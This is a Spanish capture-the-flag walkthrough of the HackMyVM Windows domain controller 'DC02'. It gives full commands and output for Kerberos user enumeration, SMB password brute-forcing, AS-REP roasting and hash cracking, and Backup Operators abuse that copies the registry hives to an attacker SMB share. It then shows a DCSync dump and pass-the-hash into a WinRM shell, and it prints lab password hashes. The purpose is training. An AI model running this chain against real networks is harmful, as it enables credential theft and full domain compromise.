DC02 – HackMyVM Link to heading

  • OS: Windows
  • Difficulty / Dificultad: Easy / Fácil
  • Platform / Plataforma: HackMyVM

‘HackMyVM’ Avatar


Resumen Link to heading

“DC02” es una máquina de dificultad fácil de la plafatorma HackMyVM la cual introduce algunos conceptos de Active Directory. Somos capaces de enumerar a través de fuerza bruta con al herramienta kerbrute. Este usuario tiene una contraseña débil, lo cual nos permite ganar acceso inicial al sistema a través de los servicios SMB y Microsoft RPC. Podemos enumerar usuarios internos usando estas credenciales, para luego performar un ataque AS-REP Roasting a estos usuarios y obtener el hash para uno de éstos. Somos capaces de crackear este hash y ganar acceso a un segundo usuario. Luego de usar el servicio LDAP para analizar qué capacidades tiene este segundo usuario, vemos que éste es parte del grupo Backup Operators. Podemos así extraer los archivos SYSTEM, SAM y SECURITY y dumpear todos los hashes en ellos. Uno de ellos funciona para la “machine account”, lo cual nos permite performar un ataque DCSync, obtener el hash del usuario Administrator y ganar total control del sistema.


User / Usuario Link to heading

Empezamos con un rápido escaneo con Nmap:

❯ sudo nmap -sS --open -p- --min-rate=5000 -n -Pn -vvv 10.20.1.139

La máquina víctima tiene varios puertos abiertos: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 SMB, 5985 Windows Remote Management (WinRM); entre otros.

Aplicando algunos escaneos de reconocimiento con la flag -sVC sobre estos puertos nos da:

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49670,49677,49694 10.20.1.139

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 00:11 -03
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.20.1.139
Host is up (0.00052s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-18 07:11:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:E6:B3:35 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:e6:b3:35 (Oracle VirtualBox virtual NIC)
|_clock-skew: 3h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-10-18T07:12:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.56 seconds

Podemos usar la herramienta NetExec para revisar el dominio de la máquina:

❯ nxc smb 10.20.1.139

SMB         10.20.1.139     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)

Tenemos un dominio: SOUPEDECODE.LOCAL.

Si tratamos de loguearnos como guest o una “null session” en SMB tenemos acceso denegado. Por tanto, luego de quedarnos sin opciones, podemos intentar usar la herramienta Kerbrute (descargable desde su repositorio de Github) para buscar por usuarios:

❯ kerbrute userenum -d 'SOUPEDECODE.LOCAL' --dc 10.20.1.139 /usr/share/seclists/Usernames/Names/names.txt -t 30

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/18/24 - Ronnie Flathers @ropnop

2024/10/18 00:36:58 >  Using KDC(s):
2024/10/18 00:36:58 >   10.20.1.139:88

2024/10/18 00:36:58 >  [+] VALID USERNAME:       admin@SOUPEDECODE.LOCAL
2024/10/18 00:36:58 >  [+] VALID USERNAME:       charlie@SOUPEDECODE.LOCAL
2024/10/18 00:36:59 >  Done! Tested 10177 usernames (2 valid) in 1.157 seconds

Tenemos un usuario: charlie.

Podemos entonces intentar performar un Brute Force Password Login (intentar loguear por fuerza bruta) con el diccionario rockyou.txt para este usuario a través del servicio SMB usando la herramienta NetExec nuevamente:

❯ nxc smb 10.20.1.139 -u 'charlie' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

SMB         10.20.1.139     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.139     445    DC01             [-] SOUPEDECODE.LOCAL\charlie:123456 STATUS_LOGON_FAILURE
SMB         10.20.1.139     445    DC01             [-] SOUPEDECODE.LOCAL\charlie:12345 STATUS_LOGON_FAILURE
SMB         10.20.1.139     445    DC01             [-] SOUPEDECODE.LOCAL\charlie:123456789 STATUS_LOGON_FAILURE
<SNIP>
SMB         10.20.1.139     445    DC01             [-] SOUPEDECODE.LOCAL\charlie:hottie STATUS_LOGON_FAILURE
SMB         10.20.1.139     445    DC01             [-] SOUPEDECODE.LOCAL\charlie:tinkerbell STATUS_LOGON_FAILURE
SMB         10.20.1.139     445    DC01             [+] SOUPEDECODE.LOCAL\charlie:charlie

Tenemos credenciales: charlie:charlie.

No obstante, no somos capaces de ver ningún recurso compartido interesante:

❯ nxc smb 10.20.1.139 -u 'charlie' -p 'charlie' --shares

SMB         10.20.1.139     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.139     445    DC01             [+] SOUPEDECODE.LOCAL\charlie:charlie
SMB         10.20.1.139     445    DC01             [*] Enumerated shares
SMB         10.20.1.139     445    DC01             Share           Permissions     Remark
SMB         10.20.1.139     445    DC01             -----           -----------     ------
SMB         10.20.1.139     445    DC01             ADMIN$                          Remote Admin
SMB         10.20.1.139     445    DC01             C$                              Default share
SMB         10.20.1.139     445    DC01             IPC$            READ            Remote IPC
SMB         10.20.1.139     445    DC01             NETLOGON        READ            Logon server share
SMB         10.20.1.139     445    DC01             SYSVOL          READ            Logon server share

Podemos revisar si tenemos acceso al servicio Microsoft RPC con estas credenciales y la herramienta rpcclient:

❯ rpcclient 10.20.1.139 -U 'charlie%charlie' -c 'getusername'

Account Name: charlie, Authority Name: SOUPEDECODE

Podemos entonces usar el comando enumdomusers de rpcclient, junto con algunas manipulaciones del output usando awk y grep, para guardar todos los usuarios del sistema:

❯ rpcclient -U 'charlie%charlie' 10.20.1.139 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}' > potential_users.txt

Obtenemos así 964 usuarios:

❯ wc -l potential_users.txt

964 potential_users.txt

Dado que tenemos potenciales usuarios, veamos si podemos performar un AS-REP Roasting para obtener el hash de alguno de ellos usando la herramienta GetNPUsers.py de Impacket:

❯ impacket-GetNPUsers SOUPEDECODE.LOCAL/charlie:charlie -dc-ip 10.20.1.139 -usersfile potential_users.txt -outputfile hashes_found

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
<SNIP>

Tenemos un hash:

❯ cat hashes_found

$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:749ce46b7ea7e03ce5091a1e87995b60$10a816ab92dc2a6b62aa862541feb1ace6cdaabf38626ebcf39697f31a20f65cf88c6c8af55e21311b4fc7b050b660a1147ea95c6ff0503cfc66c767ffbe5f81acf77f0d07e49a9f97ec462c57a5a880d8b8bd040f326b45df6f3b36443e17678413e3b46e8e3b58916b88ee5c306c278673d3be88a78a65a361f600bd2e871980bbaf194f07d7e64c8a5ed1dcd36745df6cdb47370db474095fd62e81f5aa2231a3bbb7811ef1b1101930b2664396080cfe157b996beff4b94882bbe2d2d96f0d0950e861d8cee6156dfb0ca0c7533ef7556765dc86d0908736a488d731a370648649cf02ac644e0e962fb7edfb9fb3d43f856d3819

Podemos entonces intentar crackear este hash a través de un Brute Force Password Cracking con la herramienta JohnTheRipper junto con el diccionario rockyou.txt:

❯ john --wordlist=/usr/share/wordlists/rockyou.txt hashes_found

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
internet         ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL)
1g 0:00:00:00 DONE (2024-10-18 00:55) 14.28g/s 18285p/s 18285c/s 18285C/s 123456..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Tenemos nuevas credenciales: zximena448:internet.


NT Authority/System - Administrador Link to heading

Para obtener info acerca de este usuario (y dado que obtener información con Bloodhound no funcionó por algunos errores de la máquina víctima) usaremos la herramienta ldapdomaindump:

❯ ldapdomaindump -u 'SOUPEDECODE.LOCAL\zximena448' -p 'internet' 10.20.1.139

[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Para visualizar de mejor manera lo obtenido, podemos empezar un servidor Python HTTP en el puerto 8080:

❯ ls -la && python3 -m http.server 8080

total 4136
drwxrwxr-x 2 gunzf0x gunzf0x    4096 Oct 18 01:02 .
drwxrwxr-x 3 gunzf0x gunzf0x    4096 Oct 18 01:02 ..
-rw-rw-r-- 1 gunzf0x gunzf0x   29016 Oct 18 01:00 domain_computers_by_os.html
-rw-rw-r-- 1 gunzf0x gunzf0x   12399 Oct 18 01:00 domain_computers.grep
-rw-rw-r-- 1 gunzf0x gunzf0x   28694 Oct 18 01:00 domain_computers.html
-rw-rw-r-- 1 gunzf0x gunzf0x  212790 Oct 18 01:00 domain_computers.json
-rw-rw-r-- 1 gunzf0x gunzf0x   10182 Oct 18 01:00 domain_groups.grep
-rw-rw-r-- 1 gunzf0x gunzf0x   17142 Oct 18 01:00 domain_groups.html
-rw-rw-r-- 1 gunzf0x gunzf0x   79554 Oct 18 01:00 domain_groups.json
-rw-rw-r-- 1 gunzf0x gunzf0x     247 Oct 18 01:00 domain_policy.grep
-rw-rw-r-- 1 gunzf0x gunzf0x    1143 Oct 18 01:00 domain_policy.html
-rw-rw-r-- 1 gunzf0x gunzf0x    5255 Oct 18 01:00 domain_policy.json
-rw-rw-r-- 1 gunzf0x gunzf0x      71 Oct 18 01:00 domain_trusts.grep
-rw-rw-r-- 1 gunzf0x gunzf0x     828 Oct 18 01:00 domain_trusts.html
-rw-rw-r-- 1 gunzf0x gunzf0x       2 Oct 18 01:00 domain_trusts.json
-rw-rw-r-- 1 gunzf0x gunzf0x  336005 Oct 18 01:00 domain_users_by_group.html
-rw-rw-r-- 1 gunzf0x gunzf0x  226805 Oct 18 01:00 domain_users.grep
-rw-rw-r-- 1 gunzf0x gunzf0x  471611 Oct 18 01:00 domain_users.html
-rw-rw-r-- 1 gunzf0x gunzf0x 2742425 Oct 18 01:00 domain_users.json
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Una vez hecho, podemos abrir un navegador de internet como Firefox, visitar http://127.0.0.1:8080 y clickear en el archivo domain_users.html. Hecho esto, buscamos por el usuario zximena448:

DC02 1

Este usuario es parte del grupo Backup Operators (Operadores de copia de seguridad en español).

Información
Los miembros del grupo Operadores de copia de seguridad pueden hacer copias de seguridad y restaurar archivos de un equipo, independientemente de los permisos que protejan dichos archivos.

Este usuario puede crear copias de respaldo de archivos importantes del sistema. El gran problema yace en que no tenemos acceso directo a la máquina víctima (es decir, no tenemos un terminal/consola en la cual podamos operar dentro de ella). Sólo tenemos acceso a través del servicio SMB. Luego de buscar algunas cosas encuentro esta página web; más especificamente, si miramos la sección Remote SAM Database Extraction podemos ver que está usando un script llamado reg.py de este repositorio de Github. Antes de correr este script, compartimos un recurso compartido a través de SMB usando la herramienta impacket-smbserver:

❯ impacket-smbserver smb2Folder $(pwd) -smb2support

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

y usamos entonces el script reg.py, luego de descargarlo, para pasar los archivos de respaldo a desde la máquina víctima a nuestra máquina de atacante:

❯ python3 reg.py zximena448:'internet'@10.20.1.139 backup -p '\\10.20.1.110\smb2Folder\'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Dumping SAM hive to \\10.20.1.110\smb2Folder\\SAM
Dumping SYSTEM hive to \\10.20.1.110\smb2Folder\\SYSTEM
Dumping SECURITY hive to \\10.20.1.110\smb2Folder\\SECURITY

Podemos revisar si los archivos han sido descargados:

❯ ls -la

total 11232
drwxrwxr-x 4 gunzf0x gunzf0x     4096 Oct 18 01:14 .
drwxrwxr-x 5 gunzf0x gunzf0x     4096 Oct 14 21:11 ..
<SNIP>
-rwxrwxr-x 1 gunzf0x gunzf0x    28672 Oct 18 01:14 SAM
-rwxrwxr-x 1 gunzf0x gunzf0x    32768 Oct 18 01:14 SECURITY
-rwxrwxr-x 1 gunzf0x gunzf0x 11390976 Oct 18 01:14 SYSTEM

y están allí.

Ahora, podemos usar impacket-secretsdump para dumpear todos los hashes en estos archivos:

❯ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:6c2ed76a8d87cc001b635fd0efcdbc2941dd663c3814cbbeb77c64034d9b50d2cdb1aaef3bc88995ef985da5f7bc8f7b212e5d23a2f24f6d3c35f8c8a668ec05410e15591afb488a52abc409385f8a7bb717754e4d978f0ec523fb928f6596a21087fa4b97c48a532d2190253b0d1735c49bd6940a78085eab8911a0b4f2cd79b3b25444b38337f5e122740b01275c382bddff03ada405b77b8058ae6654e6e4f13fb57b73de6884c60b06d3bd65d637169b9a504ad044f59da2ec4841cd7ce73fab2e4d742a6969d55ef650ff1b592253db66b30bd5d32e38bb2e7eb21db1a0bfbe28320d1bbd89bf4afbc0abce91a8
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:7389fb98743431b6a5c1c52109535c67
[*] DPAPI_SYSTEM
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM
 0000   44 C5 ED CE F5 0E BF 0C  15 63 8B 8D 2F A3 06 8F   D........c../...
 0010   62 4D CA D9 55 20 44 41  75 55 3E 85 82 06 21 14   bM..U DAuU>...!.
 0020   8E FA A1 77 0A 9C 0D A4  9A 96 44 7C FC 89 63 91   ...w......D|..c.
 0030   69 02 53 95 1F ED 0E 77  B5 24 17 BE 6E 80 A9 91   i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up...

Un problema es que el hash para el usuario Administrator no funciona:

❯ nxc smb 10.20.1.139 -u 'Administrator' -H '209c6174da490caeb422f3fa5a7ae634'

SMB         10.20.1.139     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.139     445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:209c6174da490caeb422f3fa5a7ae634 STATUS_LOGON_FAILURE

No obstante, podemos ver un hash para $MACHINE.ACC:

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:7389fb98743431b6a5c1c52109535c67

Usualmente, las “machine accounts” terminan con el caracter $ (por ejemplo, DC01$, WIN12312$, etc). Del output de NetExec podemos ver que el nombre de la máquina es DC01:

❯ nxc smb 10.20.1.139

SMB         10.20.1.139     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)

Por tanto la “machine account” debería de ser DC01$. Podemos si el hash dumpeado sirve para el usuario DC01$:

❯ nxc smb 10.20.1.139 -u 'DC01$' -H '7389fb98743431b6a5c1c52109535c67'

SMB         10.20.1.139     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.139     445    DC01             [+] SOUPEDECODE.LOCAL\DC01$:7389fb98743431b6a5c1c52109535c67

Funciona.

Basados en este blog, podemos intentar entonces un ataque DCSync para dumpear todos los hashes junto con la herramienta impacket-secretsdump:

❯ impacket-secretsdump SOUPEDECODE.LOCAL/'DC01$'@10.20.1.139 -hashes aad3b435b51404eeaad3b435b51404ee:7389fb98743431b6a5c1c52109535c67

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
soupedecode.local\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
<SNIP>

Tenemos nuevos hashes. Vemos si este hash sirve para el usuario Administrator:

❯ nxc smb 10.20.1.139 -u 'Administrator' -H '8982babd4da89d33210779a6c5b078bd'
SMB         10.20.1.139     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.139     445    DC01             [+] SOUPEDECODE.LOCAL\Administrator:8982babd4da89d33210779a6c5b078bd (Pwn3d!)

Podemos entonces conectarnos a través de evil-winrm como este usuario a través del servicio WinRM:

❯ evil-winrm -i 10.20.1.139 -u 'Administrator' -H '8982babd4da89d33210779a6c5b078bd'

Evil-WinRM shell v3.6

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

soupedecode\administrator

GG.

~Happy Hacking